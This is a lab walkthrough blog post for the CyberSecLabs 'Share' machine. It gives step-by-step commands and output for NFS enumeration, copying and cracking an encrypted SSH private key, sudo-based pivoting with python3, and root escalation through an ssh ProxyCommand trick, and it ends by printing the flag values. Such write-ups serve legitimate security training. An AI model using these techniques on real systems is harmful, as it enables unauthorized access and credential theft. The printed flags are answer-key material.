csl-share-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Share at  https://www.cyberseclabs.co.uk/labs/beginner-labs

Tasks

NMAP ENUM

kali@kali:~/cyberseclabs$ sudo nmap -p- 172.31.1.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-24 09:49 EDT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 172.31.1.7
Host is up (0.10s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
27853/tcp open unknown -> ssh
34971/tcp open unknown
36663/tcp open unknown
50727/tcp open unknown
56401/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 621.71 seconds

RPC ENUM

kali@kali:~/cyberseclabs$ mkdir /tmp/amir
kali@kali:~/cyberseclabs$ sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir
[sudo] password for kali:kali
kali@kali:~/cyberseclabs$ cd /tmp/amir
kali@kali:/tmp/amir$ ls -la
total 40
drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 .
drwxrwxrwt 14 root root 4096 Jun 25 10:01 ..
-rw-r--r-- 1 kali kali 0 Apr 2 11:46 .bash_history
-rw-r--r-- 1 kali kali 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 kali kali 3786 Apr 2 11:46 .bashrc
drw-r--r-- 2 kali kali 4096 Apr 2 10:44 .cache
drw-r--r-- 3 kali kali 4096 Apr 2 10:44 .gnupg
-rw-r--r-- 1 kali kali 807 Apr 4 2018 .profile
drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .ssh
-rw-r--r-- 1 kali kali 0 Apr 2 10:47 .sudo_as_admin_successful
-rw-r--r-- 1 kali kali 7713 Apr 2 11:43 .viminfo
kali@kali:/tmp/amir$ cd .ssh
kali@kali:/tmp/amir/.ssh$ ls -la
total 24
drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .
drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 ..
-r-------- 1 kali kali 393 Apr 2 11:12 authorized_keys
-r-------- 1 kali kali 1766 Apr 2 11:11 id_rsa
-rw-r--r-- 1 kali kali 1766 Apr 2 11:20 id_rsa.bak
-r-------- 1 kali kali 393 Apr 2 11:11 id_rsa.pub
kali@kali:/tmp/amir/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,8D55B7449F8965162DA3B7F2F017FC21

2lI1tgSF61MjFg2Er22GWr9hImJbuZ01I556yFoLAGNj/95ZB2H8Er9u8wfMgr8z
uB8Yuw2GmO0jJguQ4CK36kDLT/hpG5AW5WfHASzePHx58Ol2hrH+2e5IAoIwcVmi
bFN3zIYYCznn6bIvRaqwkuxaD01EG8IPxgAvm0Nr3sP539wngplyf7/+xqvPyT18
jT058FEMPFmeb+V0MHczlNWOW6wrGnxQAea2ON+IUwiSsTVSLv4QLGVWF8Lcualy
t4+4Kr47gdlxRh9HcNDztfIztimMdGp8AdV5z4KDKyL6FUVfmZqC2nxhbFUKtF7k
su7qHGpV9p9Pkglx+/rUq9NeifFcRGrhsOWctUXmWJ7BbmrqFgw1+X8ui6A/uttE
R8hEblI4obffLnGDrAO4wuH+qtA2oelwwjl/JxyqwbGH4RGAW/4AseqDzQ6RpfgQ
Sq8wBPb5MMp2ZKEzEl8qcWcwS1FCGz/VPHpnEYwfpFlcJ1kpqkiT5gmNrDFauN1m
upeSS7T5iAeHHmskbHJfNNSGYjSbTRzCSFlq2vCNXGte7jta34YCVucNHBIUR/2y
GLrm3CmVYPrjdw0irwDt+uepPfUyQQLhSqiZdbyGiljlUeij5+zJax7tOjlBBjBS
Y0rMRwiG8FGDEBbSmDZk30qB3Qb9TQcaqe9Wi/liFuxVyfbukiGW2b65JGbd7R1q
Vh6pKw4Hd35iGmVskme7evsSupEMOu9fKsJAkIrQTxadpU8wG2wkp0NTM7fh3aut
TDGKorRXOXj+cV6zehjXUYyUTesTMDh9EUVmHuixvIFX8V3w562BV28murByt7I+
ubvmZxjvh51nzpOJa4g61tnj/4OCbhFCEK4nsExh0HS11WeDAvueDauLk2Wgiw/z
/yyssrshPiXe/vxYGFJlHelyDaUSwpdrZ0AGzwUutN0rOrh3yS6yTDH2raLSa76y
e1bxe+rh2Q/iEhzqa1RbWrg7fA+5FJRLAZdYlaqlEsVt81nw4mdBCpjEbUl19egF
xIqogCAilFWvnZQ4f12JPmk0mke84idw76+SdBeof18gGiR3mWn3IyoFLRacMs5N
4zrNBXOGCVVzXCoo88ioYw1I91O57c0vbx8S40SbIevUprphf3VTZlyrRxw2AB/R
zclXHN/fEewst2maxauD+32Krm1uvTcCNk3CNre7NwPb6tB0rY3R3E7h2S/MKt0Y
eZKbFFmLwnokHqzSI8uIy8wrPj6H9R+wxT0+/KPyi3L7JIbParsHO4flBx1sMCUl
jlSNW/3J2ADP7QKA5AyjVcsIbp/aXyeJKCtglRc4Yl8mEmCroe61pCDO0mnatWxF
Y9/z6VRC61sjO4T1xYcGFSlVeXANuN8TYR8mUyvruG8OoNQ65RvgxSCRPzFe4EAm
xmXIQ4pDW59LSO7PnPdjsGN8eY7xTnG5509DYK6FoUC0T8hjp/wR9ucKDDqQoXpW
BM9cM5IPltG+wAlP39EbGMinnqgqDazWAk/wSKo4ieGLnWcNORe7Ti299tImCy0l
8zJWICDbH7bSMYyVPlWBrgUBWQ6xFI55iKdhjhlQdblZI04DoSathKFe+Khjb8bi
-----END RSA PRIVATE KEY-----
kali@kali:/tmp/amir/.ssh$

CRACK FOR “ID_RSA” PASSPHRASE WITH JOHN

kali@kali:~/cyberseclabs$ python ssh2john.py id_rsa > id_rsa.hash 
kali@kali:~/cyberseclabs$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hello6 (id_rsa)
1g 0:00:00:10 DONE (2020-06-25 10:08) 0.09157g/s 1313Kp/s 1313Kc/s 1313KC/sa6_123..*7¡Vamos!
Session completed
kali@kali:~/cyberseclabs$

SSH CONNECT TO MACHINE WITH ID_RSA
(SSH port different. Port number is 27853)

kali@kali:~/cyberseclabs$ ssh -i id_rsa amir@172.31.1.7 -p 27853
Enter passphrase for key 'id_rsa':hello6
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Thu Jun 25 13:59:46 UTC 2020

System load: 0.0 Processes: 105
Usage of /: 39.2% of 9.78GB Users logged in: 0
Memory usage: 34% IP address for eth0: 172.31.1.7
Swap usage: 0%


21 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Thu Jun 25 13:00:51 2020 from 172.31.249.99
amir@shares:~$

access.txt file not include amir files, try first sudo -l command

https://gtfobins.github.io/gtfobins/python/#sudo

amir@shares:/tmp$ sudo -l
Matching Defaults entries for amir on shares:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User amir may run the following commands on shares:
    (ALL : ALL) ALL
    (amy) NOPASSWD: /usr/bin/pkexec
    (amy) NOPASSWD: /usr/bin/python3

amir@shares:/home$ sudo -u amy /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
amy@shares:/home$ ls
amir amy
amy@shares:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 2 15:28 .
drwxr-xr-x 24 root root 4096 Apr 2 14:34 ..
drwxrwxr-x 5 amir amir 4096 Apr 2 15:43 amir
drwxr-xr-- 2 amy amy 4096 Apr 2 15:41 amy
amy@shares:/home$ cd amy
amy@shares:/home/amy$ ls
access.txt
amy@shares:/home/amy$ ls
access.txt
amy@shares:/home/amy$ cat access.txt
dc17a108efc49710e2fd5450c492231c

FOR ROOT ACCESS

https://gtfobins.github.io/gtfobins/ssh/#sudo

amy@shares:/home/amy$ sudo -l
Matching Defaults entries for amy on shares:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User amy may run the following commands on shares:
(ALL) NOPASSWD: /usr/bin/ssh
amy@shares:/home/amy$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# bash
root@shares:/home/amy# cd /root
root@shares:/root# ls -la
total 28
drwx------ 3 root root 4096 Apr 2 15:39 .
drwxr-xr-x 24 root root 4096 Apr 2 14:34 ..
-rw------- 1 root root 78 Apr 2 15:46 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Apr 2 14:43 .ssh
-rw-r--r-- 1 root root 33 Apr 2 15:39 system.txt
root@shares:/root# cat system.txt
b910aca7fe5e6fcb5b0d1554f66c1506
root@shares:/root#

Author – Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *